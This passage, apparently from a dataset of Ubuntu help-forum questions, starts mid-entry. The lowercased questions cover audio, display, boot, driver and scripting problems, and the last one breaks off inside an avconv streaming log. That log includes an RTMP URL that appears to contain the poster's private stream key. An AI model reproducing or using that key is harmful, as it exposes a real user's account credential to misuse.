sound control gui closed . i tried each of the last two , running alone . no improvement . alsamixer only shows hda intel and i think it 's only the intel audio , not the hdmi . edit : kernel 3.6.7 & 3.6.8 ( custom compile ) allow me to use hdmi audio with any and all programs . do n't know if it 's improved support or just the right compile options compared to the 3.5 kernel that 's now in the ubuntu repos .
218444	sound output starts delayed	via spdif hearable sound starts late , e. g. in the test sound dialog i maximally can hear `` left '' when the voice should say `` front left '' . when i have pavucontrol open ( in the background ) whilst clicking on the test sound it starts immediately . generally , starting any audio/media file , the beginning is not output/hearable . connecting either optical or coaxial . this only seems to affect ubuntu 12.10 , was n't the case in 12.04 , does n't seem to be the case in 13.04 ! from ubuntuusers.de a bit of help -- playing a non hearable sinus to keep spdif alive : apt-get install sox play -n -c2 synth sin gain -100 # -c2 for two channels hardware on an asrock 970 extreme3 ( and geforce 210 ) : $ cat /proc/asound/cards 0 [ sb ] : hda-intel - hda ati sb hda ati sb at 0xfe200000 irq 16 1 [ nvidia ] : hda-intel - hda nvidia hda nvidia at 0xfe080000 irq 25 $ cat /proc/asound/card0/codec* | grep codec codec : realtek alc892 some pulseaudio -v output pasted to http : //paste.ubuntu.com/5629082/ can i upgrade from pulseaudio 2.1 somehow ? live ubuntu 13.04 output pasted to http : //paste.ubuntu.com/5630475/ -- actually here only the very first invocation of sound ( or after some long user pause ? ) starts delayed , ie after `` ... left '' , `` front right '' is heard whereas in 12.10 it 's always `` ... left '' , `` ... right '' .
218445	focus follows mouse stops working when opening window from launcher and no click to focus	this is 12.04 default desktop ( unity ) . i set it to focus follows mouse , and changed the menus to be on the window . this worked for a while , then some unknown even , maybe an upgrade maybe some other setting change caused it to stop working . there are many ways for this behavior to start but one reliable one is to bring a window to the foreground/focus with the launcher . now the focus is stuck on that window and not just the window but the regions within the window so the close , maximize , minimize and menus do not work . i have to use mouse middle and then mouse right and then focus follows mouse is restored for a bit . the exact details of the mouse action are n't clear , sometimes it seems like just mouse middle helps , sometimes just right some times a desperate sequence of clicks : - ( i have tried switching to the gnome desktop and it seems to occur less there but it is not eliminated . i have tried switching mice to an old wired usb mouse . i have tried creating a new account and that has not worked . i have observed `` split focus '' where to scroll button scrolls one one window but the input goes to another . i go trapped recently where my keyboard input went to libre office calc , but i was selecting the search term in the chrome address window . the selection `` grayed '' but the keyboard input for the search went to libre . regions in windows have very confused focus . i have to work hard to get focus on for example the close gliph ( x ) or the minimize gliph ( _ ) .
218450	firefox bookmarks in the ubuntu files system	i have accessed my crashed ubuntu version via live usb trial . where am supposed to find my former firefox bookmarks and history files in order to copy and transfer them into a new installation ?
218452	how not to mess up a system , yet keep it clean ?	i am newbie to ubuntu , i got into it 2 weeks ago and i reinstalled it like 10+ times already . in most cases ubuntu graphic interface wont show up , just command line . few times i had `` low graphic settings '' error . all of this happens mostly when i decide to remove useless repository , or install-remove some programs , or remove some pre-installed programs like rhytmbox or solitaire , which definitely should n't give any problems , but than baah - and my ubunt wont load . i think that good way to keep system alive is never to uninstall anything . but sometimes when i install some program from some repository , and i dont need it - i want to remove repository aswell and again my ubuntu gets destroyed . how can i keep my system clean yet working ? what should i do ? should i maybe use some backup-program also ? how can i organize my files/system so that i dont have to reinstall it all every time i mess something ? thanks alot ! p.s . : for example right now i installed lamp using taskel . something went wrong , mysql did n't get installed , so i want to remove it all and retry . how do i do it properly ? or , say , jde . i installed oracle 7 jde since i needed it for phpstorm , i failed to install it since some repository didnt exist . next time failed version installed . after finally removing old stuff and installing oracle 7 it worked , than i rebooted and bah - again my system wont load . what am i doing wrong ? am i lost for this world ? : )
218454	bash script to automate truecrypt volume creation , mounting and unmounting	i am trying to code a bash script that will automate the several tasks related to truecrypt . tasks are : creating a truecrypt volume , mounting it , copying a file in filesystem , modifying the file , unmounting the volume . i have a question regarding creating the truecrypt volume . mounting and unmounting will not be a problem for me . the command for creating volume is according to manpages : > truecrypt -c [ volume path ] but after this command trucrypt will prompt user to enter several parameters like volume type , size , encryption , hash , password etc . how can automate all these so that user does n't need to enter any value ? ok i can use following command for this : truecrypt –size 200m –type normal –encryption aes –hash sha-512 –filesystem fat -c myvolume.tc but now it asks for password . how to automate that ? thanks
218458	how to increase text size on lubuntu ?	my o.s . is lubuntu 12.04 . and i 'm having some problems to read the text of my screen , because it appears very small . i 've read how to increase text size ? , but it only explains how to increase text size in ubuntu and as lubuntu uses another desktop environment i 'm not being able to follow that question .
218460	is there anything i should be careful with when reinstalling ubuntu on a multiboot system ?	i have a win 7 and ubuntu 11.10 multiboot system on my laptop . i am planning to upgrade ubuntu , but i 'd like to do it with a cd and make a new installation . i am wondering if there is anything i need to know about before i start altering my system . i think i just have to format and choose the partition where my current ubuntu os is and set the boot for the entire hd and that way thing will go smoothly and after the installation the screen will appear again ( the screen where i can choose between win7 and ubuntu ) . is it so ?
218468	network sharing for android	i am on ubuntu 12.04 and i want to create a wifi hotspot to be used with my android device . now i know there are so many tutorials available every where and that i have all options in network tab to use but i could n't get it to work . android does not work with an adhoc connection and whatever wifi network i created , my android device could not connect to it ( i could connect a phone using bada to it and other computers can also be connected ) i know the work around to get android on a adhoc connection but ca n't i have some thing as simple as connectify for windows ? ps : i am not looking for workarounds involving android .
218476	node remains in commissioning status	i have been trying to set up ubuntu cloud 12.04 . i 'm kind of new to maas and ubuntu . here is what i followed . have installed maas server using the steps provided in https : //wiki.ubuntu.com/serverteam/maas for the node , i installed the ubuntu 12.04 server image on a usb stick . then restarted the node and opted to enlist the node via boot media , with pxe . once the process was done , the node was powered off as expected . i manually powered on the node , as my node is not pxe enabled . result - no node was visible on maas ui since step 2 did n't work , i added the node via maas-cli . command . after the execution of this command i got the node reflected on to my maas ui . but the status continues to be in '' commissioning '' for a long time . then i executed `` maas-cli maas nodes check-commissioning `` and i got `` unrecognised signature : post check_commissioning '' . i 'm not sure where is the error . could some one please help me solve this issue . i checked the following log file but found no error related to commissioning ( pserv.log / maas.log / celery.log/celery-region.log ) . i found this entry in my auth.log `` nov 16 18:20:34 ubuntucloud sshd [ 4222 ] : did not receive identification string from xxx.xx.xx.x '' not sure if it indicates anything as the ip that is mentioned is not of the node nor of the maas server . i also verified the time on the server and node using date cmd - ( at one instance the times are : server : fri nov 16 18:15:51 ist 2012 and node fri nov 16 18:15:43 ist 2012 ) . not sure if 'date ' the right cmd to set the time . i have also check maas_local_settings.py for the maas url . i 'm not sure what are the logs that need to be verified . is there any log that can be checked on the node . thanks vinitha i kind of figured out what is going wrong . i had missed setting the entry in dhcp server to point to maas server . but my question now is , i 'm trying to set the cloud environment within the lan , and we already have a dhcp server in the network and i will not be able to have my own dhcp server nor can i modify the existing dhcp server to point to maas server . is there a possibility of having a maas setup with in an existing lan ? . any link / workaround to this would be of great help . thanks vinitha
218479	ubuntu 12.04 update manager not offering 12.10 upgrade	i have 12.04 with all updates applied as of 11-17-12 . re-ran update manager and it does not offer 12.10 to me . i am doing this in virtualbox latest version . is this the reason ? if not how to get update manager to offer me 12.10 ? thx : )
218481	problem in installing ubuntu 12 using usb	i have a sony laptop ( vpceh25en ) and i am trying to install ubuntu 12.04 lts . i downloaded the iso named `` ubuntu-12.04-desktop-amd64.iso '' . for installing i created a bootable usb using ultraiso . when i booted the usb it hangs and shows `` booting from usb `` , i even left it for hours and it did n't moved a bit . when i booted the iso in virtual box , it ran well . i even used other tools to make a bootable usb , then it says `` bootmngr missing `` . please help , i am new to ubuntu and my optical drive is fried . thanks in advance..
218488	ca n't deploy to localhost with phpstorm	i installed lamp using sudo tasksel install lamp-server i configured phpstorm to use /var/www folder as root deployment folder , also specified http : //localhost as web-server root url : when i deploy my index.html page with `` helloworld '' to my server - page is not found , neither is it in /var/www . why ?
218494	i want to develop for linux , where do i start ?	so , i am currently running ubuntu 10.04 and i would like to start developing for linux . i am already developing some stuff for mac os , so it would be great if i could use objective c. if that is not possible , it 's not that big of a problem , so my main question is : where do i start ? what kind of developer kits are available ? i 've heard of gnu step , are there any good beginners tutorials for it ( the gui ) and for the interface builder ? thank you in advance .
218496	sending keyboard commands to ubuntu through python . remote for my blackberry	i am trying to build a remote control application to control media on my ubuntu . does anyone know a way in order to accomplish this . the media keys in particular . thank you . edit 1 : i have tried using xte , but is seems python in truncating the input or there is a limit or something which means that you ca n't do ctrl + key key presses , which wont suit my needs . i also tried uinput , but alas you need to run it as root , which also will not quite my needs . now i am looking at evdev which seems promicing , that is if i can get it working .
218500	format sdcard and read superblock issue	i 've tried to format my sd card with no luck so far . everytime i put it in my card reader , ubuntu throws back at me this error : error mounting /dev/sdb1 at /media/haunted/fc30-3da9 : command-line `mount -t `` vfat '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush '' `` /dev/sdb1 '' `` /media/haunted/fc30-3da9 '' ' exited with non-zero exit status 32 : mount : /dev/sdb1 : ca n't read superblock also i have installed gparted to see if it was detected at least , but apparently no . i can safely rule out a card reader issue : windows 7 and the digital camera also have problems reading the memory card . is there anything i can do ? edit ( dmsg output ) : [ 467.145226 ] sdb : sdb1 [ 468.618376 ] fat-fs ( sdb1 ) : error , invalid access to fat ( entry 0x0d9025b8 ) [ 468.618381 ] fat-fs ( sdb1 ) : filesystem has been set read-only [ 14525.007780 ] fat-fs ( sdb1 ) : error , invalid access to fat ( entry 0x0d9025b8 ) [ 14525.007784 ] fat-fs ( sdb1 ) : filesystem has been set read-only [ 14528.686295 ] fat-fs ( sdb1 ) : error , invalid access to fat ( entry 0x0d9025b8 ) [ 14528.686304 ] fat-fs ( sdb1 ) : filesystem has been set read-only [ 14532.642288 ] fat-fs ( sdb1 ) : error , invalid access to fat ( entry 0x0d9025b8 ) [ 14532.642297 ] fat-fs ( sdb1 ) : filesystem has been set read-only [ 14549.438700 ] sdb : sdb1 [ 14549.846281 ] fat-fs ( sdb1 ) : error , invalid access to fat ( entry 0x0d9025b8 ) [ 14549.846286 ] fat-fs ( sdb1 ) : filesystem has been set read-only
218501	wireless driver not working for wpa after update to 12.10	i updated from 12.04 ( all working ) to 12.10 last night and unable to get the wireless driver working properly . it seems to work with no wireless security , but not with wpa . i have tried with other wireless devices and all seems ok . the laptop is a asus x53z . when i run the following lspci -nn i get the following output 03:00.0 network controller [ 0280 ] : atheros communications inc. ar9485 wireless network adapter [ 168c:0032 ] ( rev 01 ) hope someone can please help ? ? ?
218503	kde not removed ?	i have been used ubuntu 12.04 whit kde , before i upgraded to 12.10 i removed kde . now some programs , icons and buttons still have the kde skin while i 'm using unity ? how can i fix this ? ps : i know that there are some other questions like this kde skin in unity after installing kde but it dont seems like he have removed kde .
218508	low resolution dektop intel i7 3770 and intel board dh67bl	i installed ubuntu 12.04.1 in a desktop with the following specs : cpu : intel ( r ) core ( tm ) i7-3770 cpu @ 3.40ghz motherboard : intel dh67b however the monitor is not identified ( monitor : unknown ) such that maximum resolution is 1024x768 . this occurs with samsung syncmaster 2033 ( resolution 1900x600 ) , and is the same with viewsonic vx2453mh-led ( resolution 1920x1080 ) . i 'd be very grateful if anyone could give me a suggestion as to how to fix the resolution .
218509	kvm performs poorly - virtualizing windows 7/xp under ubuntu 11.04	i 'm trying to virtualize any windows os on my amd e-350 . i enabled the hardware virtualization in the bios but it somehow seems to perform very poorly ! win xp install took about 2.5h and seems kind of exhausted ( slow application start , cpu utilization at nearly 100 % , ~5mb/s in io ) i did n't even finish the installation of 7 since it did n't seem to perform any better . the image format is qcow2 i 'm using virtio drivers for this image as well as for the networking i 'm wondering about this since the performance was way ( ! ) better on my laptop intel cpu ( which is 3yrs old ) do you have any idea ?
218511	apt-get giving an error	when i try to run update , upgrade or install i always get an error : setting up initscripts ( 2.88dsf-34 ) ... ca n't exec `` insserv '' : no such file or directory at /usr/sbin/update-rc.d line 391. update-rc.d : error : insserv rejected the script header dpkg : error processing initscripts ( -- configure ) : subprocess installed post-installation script returned error exit status 255 configured to not write apport reports errors were encountered while processing : initscripts e : sub-process /usr/bin/dpkg returned an error code ( 1 ) previously i tried to upgrade and got a huge error log with this kind of errors : preconfiguring packages ... setting up initscripts ( 2.88dsf-34 ) ... ca n't exec `` insserv '' : no such file or directory at /usr/sbin/update-rc.d line 391. update-rc.d : error : insserv rejected the script header dpkg : error processing initscripts ( -- configure ) : subprocess installed post-installation script returned error exit status 255 configured to not write apport reports errors were encountered while processing : initscripts error in function : setting up acpi-fakekey ( 0.141-1 ) ... ca n't exec `` insserv '' : no such file or directory at /usr/sbin/update-rc.d line 406. update-rc.d : error : insserv rejected the script header dpkg : error processing acpi-fakekey ( -- configure ) : subprocess installed post-installation script returned error exit status 255 setting up kmod ( 9-2 ) ... ca n't exec `` insserv '' : no such file or directory at /usr/sbin/update-rc.d line 406. update-rc.d : error : insserv rejected the script header dpkg : error processing kmod ( -- configure ) : subprocess installed post-installation script returned error exit status 255 setting up dbus ( 1.6.8-1 ) ... ca n't exec `` insserv '' : no such file or directory at /usr/sbin/update-rc.d line 406. update-rc.d : error : insserv rejected the script header dpkg : error processing dbus ( -- configure ) : subprocess installed post-installation script returned error exit status 255 dpkg : dependency problems prevent configuration of rhythmbox : rhythmbox depends on dbus ; however : package dbus is not configured yet . what 's wrong ?
218512	how to detect flash process in google chrome ?	i'am using this script -- lightson , to delay screensaver when flash playing . however , the script provides only the chromuim way : flash_process=`pgrep -lfc `` chromium-browser -- type=plugin -- plugin-path=/usr/lib/adobe-flashplugin '' ` i am using the official google chrome in xfce . not familiar with shell programming , the screenshot of my process running in chrome . i want to know how to detect the process of flash player to make this script running ? thanks .
218514	how do i make a popup message that will open whenever the user open firefox ?	where i work , we have 2 public ubuntu computers . i want to set up a custom message to be prompted whenever the user opens firefox .
218516	can i make grub not show up despite multiple os being present and continue directly to boot the default one ?	okay here is the situation - i have 1.ubuntu ( default ) 2.windows xp . i use xp only for android rooting and stuff and thus do not need it 90 % of times . now what i want should happen is , grub should not show up and directly boot to ubuntu in normal everyday circumstances . and when i shall want xp , i will do the exact opposite change to what i did to exclude it and make grub show up . ( obviously first booting into ubuntu , doing that change and then rebooting to get grub ) so , how can i achieve this ?
218523	no ubuntu one option when i right click on a folder : running ubuntu 12.04	when i right click on a folder , i do n't get a ubuntu one option . what can i do to add it to my right click menu ? running ubuntu 12.04 on a 64-bit system .
218524	skype crashes in ubuntu 12.04	i am using linux , in fact i started using ubuntu when i first met computers . if i remember it correctly , i am using ubuntu since 4.04 . i also tried other linux versions . skype worked perfectly fine all the way but in ubuntu 12.04 it crashes , skype logs in successfully but when its logged in it crashes .
218533	setting up a mail server to send mail from ip	i have a fixed lan ip , but no domain name . i 'd like to be able to send emails within the lan , and receive mails sent to my ip ( user needs to send an email to username @ 10.xx.xx.xx ) . i 've tried the stuff in this post -- the `` easy '' one gives me an imap error in squirrelmail ( imap is open and listening , but not working ) , and the `` hard '' one seems to be outdated . is it possible to set up an email server ( preferably on 12.04 ) without having a domain name ?
218534	problem with graphics on 12.10	i just installed 12.10 x86_64 to my new computer my hardware specs are : amd fx8120 cpu , ati hd 7770 , msi 990 fxa i 'm facing the following error : 2012-11-17 18:19:04,393 warning : /sys/module/fglrx/drivers does not exist , can not rebind fglrx driver from : additional drivers '' can not install the ati drivers . from `` system settings '' `` software sources '' only the x.org server is working but with problems compiz works continuously and if i open for example a video the fun is running like crazy . the mouse pointer goes slow . the windows act strange ( flashing , do n't open , open slowly etc ) what should i do ?
218536	no sound under ubuntu 12.10	i 've followed this : howto - resolve no sound problem on ubuntu 12.10 , 12.04 and older in addition , i 've disabled auto-mute in alsamixer . if i play a sound under vlc , i can see in pavu , that there 's something playing - that the volume is registered - yet i hear nothing . i recall my sound working prior to about a week ago , but it seems to have abruptly stopped on its own .
218539	bootloader problems grub wo n't load windows 7	i sent this to boot.repair @ gmail.com , still no response thought i could get a faster solution here . i am running windows 7 64-bit and ubuntu 12.04 lts on separate partitions . the message is sent is : boot-repair url : http : //paste.ubuntu.com/1365163/ originally i was unable to access ubuntu after a windows update ( ubuntu was installed using wubi ) . rather than logging into ubuntu from the windows 7 bootloader , it lead to the grub > command prompt . no matter what i did here , it would not log me into linux . as a result i uninstalled ubuntu from the add/remove programs application in windows 7 . i then re-installed ubuntu 12.04 lts using a livecd-usb . this time however , i created a partition . i then restarted and got the grub bootloader which loads ubuntu 12.04 lts with no problems , however when i select windows ( listed as `` windows 7 ( loader ) '' ) , it just refreshes the grub bootloader instead of loading windows 7 . i then used the windows 7 repair disk to run bootrec/fixmbr and bootrec/fixboot . this led to no bootloader coming up when i started my computer . instead i got a blank black screen with a flashing white cursor . i went on to do a bootrec/buildbcd and bootrec/scanos . these did nothing to change the situation . when i ran bootrec/scanos it said that no windows 7 installations were present . after this i decided to reinstall windows 7 only for this to do nothing to change the situation . afterwards i did a boot-repair in which i began to get the grub bootloader , which would load ubuntu 12.04 lts , but still would not load windows 7 . i also did a sudo update-grub which recognized windows 7 as being installed , but still did n't fix the issue of loading windows 7 . while running ubuntu i have no problem accessing my windows 7 partition which is formatted as ntfs . it shows all the files and folders reflecting that the re-install did take place , and it also shows all of my old applications and folders in the windows.old folder . i am completely stuck at this point and have no clue what i should do next . any help you can offer me will be greatly appreciate . thank you -- gap
218546	ubuntu 12.10 slow start of applications	some applications on ubuntu 12.10 starts very slow . i mean the time between click on app icon and first show on screen . for example vlc player takes at least 15 seconds . is there any way how to speed it up ?
218547	ubuntu one on ubuntu studio 12.04 ?	i want to install ubuntu-one but any time i am trying there is no success ! so , any help ? ubuntu studio 12.04 uses xfce and nautilus as file manager . so where is the problem ? thanks edit : well , if i install from terminal then when i start the ubuntu one it starts to install . so , the procedure continues and suddnly the windows closes and then if i try to open again ubuntu one nothing happens . edit2 : when i run ubuntuone-installer from terminal i have gabriel @ gabriel-desktop : ~ $ traceback ( most recent call last ) : file `` /usr/bin/ubuntuone-control-panel-qt '' , line 29 , in < module > from ubuntuone.controlpanel.gui.qt import main file `` /usr/lib/python2.7/dist-packages/ubuntuone-control-panel/ubuntuone/controlpanel/gui/__init__.py '' , line 26 , in < module > from ubuntuone.controlpanel.backend import ubuntuone_link file `` /usr/lib/python2.7/dist-packages/ubuntuone-control-panel/ubuntuone/controlpanel/backend.py '' , line 27 , in < module > from ubuntuone.platform.credentials import credentialsmanagementtool file `` /usr/lib/python2.7/dist-packages/ubuntuone-client/ubuntuone/platform/__init__.py '' , line 34 , in < module > from ubuntu_sso.xdg_base_directory import xdg_home importerror : no module named xdg_base_directory edit3 : gabriel @ gabriel-desktop : ~ $ ubuntuone-client ubuntuone-client : command not found this is what i have when i run ubuntuone-client or sudo ubuntuone-client
218552	beta steam uninstall	i jut installed beta steam for ubuntu 12.04 . and i ca n't open it , even with that command steam steam : //open/friends it still wo n't start . so is there any possibility to uninstall it ?
218556	how do i access the contents of my flash drive while booting from it ? [ xubuntu ]	i 'm trying to recover some files from a windows computer using a xubuntu live bootable flash drive . i 've found the files that i want to copy on my windows drive , but do n't know how to mount the flash drive that i 'm running the usb image from to copy the files over . it does n't show up in thunar , just my windows drive and the virtual xubuntu filesystem . what i need is the physical flash drive filesystem , the one that contains the iso that i 'm booting from . is there a command that i can run to mount the drive ? here is the output of lsusb ubuntu @ ubuntu : /dev $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 003 : id 03f0:3307 hewlett-packard bus 002 device 003 : id 0424:2412 standard microsystems corp . bus 002 device 004 : id 0424:2412 standard microsystems corp . bus 002 device 005 : id 413c:2107 dell computer corp . bus 002 device 006 : id 046d : c063 logitech , inc . i think that bus 001 device 003 is my flash drive .
218557	map function+backspace to delete	i 'm used to apple laptops , on which function + backspace is mapped to delete . i 'm also okay with shift + backspace . is there a way to obtain this ? note , i 'm using xmonad and have some keyboard modifications set up with xmodmap but have very little understanding of how it works . i 've tried xmodmap -e `` keycode 22 = backspace kp_delete backspace backspace '' , which works in some applications but is ignored by my terminal . i 've seen this question but it seems kde-specific . i would prefer not to have to use some gui .
218565	12.10 very , very , slow on asus eepc	just finished installing 12.10 on asus eepc 101ha . it is so slow that it is almost unusable . installation was automatic , no particular changes , and already updated software . could you please give me a hint on what to do to solve this ?
218566	gnome panel timer	i 'm a fan of the pomodoro technique ; however , i 'd like to have it integrated into my ubuntu desktop . i found a timer applet that relies on the discontinued python-gnomeapplet package . so there are two acceptable answers to my question : how can i get a timer applet in my gnome 3 panel ? i 'm using cinnamon and i 'd like to have the time remaining visible at all times . is there a ppa or other source from which i could install python-gnomeapplet ?
218567	any way to check the clock speed of my processor ?	is there any way to check at which clock speed my processor is running ? i have already tried cat /proc/cpuinfo but the clock speed i 'm running is n't showing . i know ubuntu 12.04 ( precise pangolin ) requires 700 mhz and vga , but will an amd mobile sempron work ?
218571	how can i fix a corrupted ambiance theme ?	as described in another issue , upgrading from 12.04 to 12.10 may break the ambiance theme , causing many of the menus and controls to display in a strange grey-on-grey state . i have checked another user account and the theme appears fine there , so it seems to be a user-specific issue . what can i do to reset my theme settings to the standard for 12.10 ? i assume there is some set of config files in my home directory somewhere that are customizing it incorrectly . ( as the linked issue was closed for being `` too localized '' , i 'm hoping a general fix can be provided for many similar theme issues . )
218574	how can i change from ubuntu to windows 7 back ?	i downloaded wubi and im waiting for a reply if i format it can i change between ubuntu and windows 7 whenever i want ?
218580	radeon 6520g with black screen problem . re-boot make it work	i have a hp pavilion g7 with ubuntu 12.10 . ever since i installed ubuntu on it the first time when i switch on the pc the screen hangs with a blank screen , but only works after second and subsequent restarting . my display device info http : //paste.ubuntu.com/1365995/ update : filed a bug report with launchpad https : //bugs.launchpad.net/ubuntu/+source/xorg/+bug/1080156
218585	laptop fan intermittently stopping	recently i 've noticed that the fan on my laptop stops for ~1 second every 8 seconds or so then continues to work as normal . i 've uploaded a recording of this here [ dropbox ] has anyone experienced this before and found a solution ? equally , is this a bug ?
218589	disable alt-tab switcher grouping by script or command	in ubuntu 12.04 with unity , alt-tab lets you switch between groups of windows , and makes it very annoying to switch to a specific window from a group when it is not the last window used . one way to change this behaviour and get a plain alt-tab switcher showing all windows ( without grouping ) is to install ccsm ( compiz config settings manager ) , and enable the `` static switcher '' or something similar ( ca n't remember exactly ) . i need to modify this setting on several machines , so i do n't want to install a complex package for this . ( particularly not when this package makes it easy for users to completely f*k up their system when changing the wrong settings ) . so i 'm looking for a reliable way to change this configuration , through 1 or more commands ( gconftool ? ) , or by modifying a configuration file directly . basically , i want to do directly on other machines what ccsm once did on mine to restore a sane and simple alt-tab behaviour .
218592	canon i-sensys mf3220 driver	i try to install a canon i-sensys mf-3220 printer but i can not found driver . i tried a method with capt drivers but wo't work . anybody help me ?
218593	how can i relaunch juju daemons without stop/starting local lxc containers ?	i 'm using juju in local mode with lxc . i updated juju on the host with a classical : apt-get install juju and had a plentyful of python errors in juju debug-log probably because juju processes were n't restarted . in order to restart juju processes , i had to do a complete : juju destroy-environment juju bootstrap which deleted all contents in /var/lib/lxc . i was warned , and this was not an issue , but will be when i 'll be in a production environment . is there a way to relaunch juju daemons without stop/starting lxc local vms ?
218596	simple editor with colored fonts	for my four year old son i need a text editor . he has an old laptop ( with ubuntu , no internet connection ) and loves to type . we need the following : easy changing of font colors ; best if there are buttons to change the color of the text autosave variable font width is there anything like this around ? or do i have to write one myself ?
218599	streaming desktop with avconv - severe sound issues	i 'm trying to do some live streaming in ubuntu 12.10 , but i 'm having some problems with audio . more specifically , the quality is complete garbage and it 's at least 10 seconds out of sync with the video . i 'm using an excellent guide found here to set up my loopback devices so that i can combine the desktop audio with the microphone input . it seems to work , as i 'm able to stream both audio and video to twitch.tv . but , as i said , the audio quality is terrible . the microphone audio is very , very low , but if i increase it , i get a horrible garbled sound that is absolutely unbearable . nothing like that is present during voip calls or when recording sound alone with the sound recorder , so it 's not an issue with the microphone itself . the entire audio stream is also delayed about 10-15 seconds compared to the video stream . i put together an imgur album of my settings . here is some example output from when i 'm streaming : avconv version 0.8.4-6:0.8.4-0ubuntu0.12.10.1 , copyright ( c ) 2000-2012 the libav developers built on nov 6 2012 16:51:11 with gcc 4.7.2 [ x11grab @ 0x162fd80 ] device : :0.0+570,262 - > display : :0.0 x : 570 y : 262 width : 1280 height : 720 [ x11grab @ 0x162fd80 ] shared memory extension found [ x11grab @ 0x162fd80 ] estimating duration from bitrate , this may be inaccurate input # 0 , x11grab , from ':0.0+570,262 ' : duration : n/a , start : 1353181686.735113 , bitrate : 884736 kb/s stream # 0.0 : video : rawvideo , bgra , 1280x720 , 884736 kb/s , 30 tbr , 1000k tbn , 30 tbc [ alsa @ 0x163fce0 ] capture with some alsa plugins , especially dsnoop , may hang . [ alsa @ 0x163fce0 ] estimating duration from bitrate , this may be inaccurate input # 1 , alsa , from 'pulse ' : duration : n/a , start : 1353181686.773841 , bitrate : n/a stream # 1.0 : audio : pcm_s16le , 48000 hz , 2 channels , s16 , 1536 kb/s incompatible pixel format 'bgra ' for codec 'libx264 ' , auto-selecting format 'yuv420p' [ buffer @ 0x1641ec0 ] w:1280 h:720 pixfmt : bgra [ scale @ 0x1642480 ] w:1280 h:720 fmt : bgra - > w:852 h:480 fmt : yuv420p flags:0x4 [ libx264 @ 0x165ae80 ] vbv maxrate unspecified , assuming cbr [ libx264 @ 0x165ae80 ] using cpu capabilities : mmx2 sse2fast ssse3 fastshuffle sse4.2 [ libx264 @ 0x165ae80 ] profile main , level 3.1 [ libx264 @ 0x165ae80 ] 264 - core 123 r2189 35cf912 - h.264/mpeg-4 avc codec - copyleft 2003-2012 - http : //www.videolan.org/x264.html - options : cabac=1 ref=2 deblock=1:0:0 analyse=0x1:0x111 me=hex subme=6 psy=1 psy_rd=1.00:0.00 mixed_ref=0 me_range=16 chroma_me=1 trellis=1 8x8dct=0 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=0 b_adapt=1 b_bias=0 direct=1 weightb=0 open_gop=1 weightp=1 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=30 rc=cbr mbtree=1 bitrate=712 ratetol=1.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 vbv_maxrate=712 vbv_bufsize=512 nal_hrd=none ip_ratio=1.25 aq=1:1.00 output # 0 , flv , to 'rtmp : //live.justin.tv/app/live_23011330_pt1plsrm0z5wvnj0qmchvtpmpunfc4 ' : metadata : encoder : lavf53.21.0 stream # 0.0 : video : libx264 , yuv420p , 852x480 , q=-1 -- 1 , 712 kb/s , 1k tbn , 30 tbc stream # 0.1 : audio : libmp3lame , 44100 hz , 2 channels , s16 , 712 kb/s stream mapping : stream # 0:0 - > # 0:0 ( rawvideo - > libx264 ) stream # 1:0 - > # 0:1 ( pcm_s16le - > libmp3lame ) press ctrl-c to stop encoding frame= 17 fps= 0 q=0.0 size= 0kb time=10000000000.00 bitrate= 0.0kbitframe= 32 fps= 31 q=0.0 size= 0kb time=10000000000.00 bitrate= 0.0kbitframe= 40 fps= 23 q=29.0 size= 44kb time=0.03 bitrate=13786.2kbits/s dup=frame= 47 fps= 21 q=31.0 size= 93kb time=2.73 bitrate= 277.7kbits/s dup=0frame= 62 fps= 23 q=29.0 size= 160kb time=3.23 bitrate= 406.2kbits/s dup=0frame= 77 fps= 24 q=23.0 size= 209kb time=3.71 bitrate= 462.5kbits/s dup=0frame= 92 fps= 25 q=20.0 size= 267kb time=4.91 bitrate= 445.2kbits/s dup=0frame= 107 fps= 25 q=20.0 size= 318kb time=5.41 bitrate= 482.1kbits/s dup=0frame= 123 fps= 26 q=18.0 size= 368kb time=5.96 bitrate= 505.7kbits/s dup=0frame= 139 fps= 26 q=16.0 size= 419kb time=6.48 bitrate= 529.7kbits/s dup=0frame= 155 fps= 27 q=15.0 size= 473kb time=7.00 bitrate= 553.6kbits/s dup=0frame= 170 fps= 27 q=14.0 size= 525kb time=7.52 bitrate= 571.7kbits/s dup=0 frame= 180 fps= 25 q=-1.0 lsize= 652kb time=7.97 bitrate= 670.0kbits/s dup=0 drop=32 //here i stop the streaming video:531kb audio:112kb global headers:0kb muxing overhead 1.345945 % [ libx264 @ 0x165ae80 ] frame i:1 avg qp:30.43 size : 39748 [ libx264 @ 0x165ae80 ] frame p:45 avg qp:11.37 size : 11110 [ libx264 @ 0x165ae80 ] frame b:134 avg qp:15.93 size : 27 [ libx264 @ 0x165ae80 ] consecutive b-frames : 0.6 % 0.0 % 1.7 % 97.8 % [ libx264 @ 0x165ae80 ] mb i i16..4 : 7.3 % 0.0 % 92.7 % [ libx264 @ 0x165ae80 ] mb p i16..4 : 0.1 % 0.0 % 0.1 % p16..4 : 49.1 % 1.2 % 2.1 % 0.0 % 0.0 % skip:47.4 % [ libx264 @ 0x165ae80 ] mb b i16..4 : 0.0 % 0.0 % 0.0 % b16..8 : 0.1 % 0.0 % 0.0 % direct : 0.0 % skip:99.9 % l0:42.5 % l1:56.9 % bi : 0.6 % [ libx264 @ 0x165ae80 ] coded y , uvdc , uvac intra : 82.3 % 87.4 % 71.9 % inter : 7.1 % 8.4 % 7.0 % [ libx264 @ 0x165ae80 ] i16 v , h , dc , p : 27 % 29 % 16 % 28 % [ libx264 @ 0x165ae80 ] i4 v , h , dc , ddl , ddr , vr , hd , vl , hu : 22 % 21 % 14 % 8 % 8 % 8 % 7 % 5 % 7 % [ libx264 @ 0x165ae80 ] i8c dc , h , v , p : 47 % 22 % 20 % 11 % [ libx264 @ 0x165ae80 ] 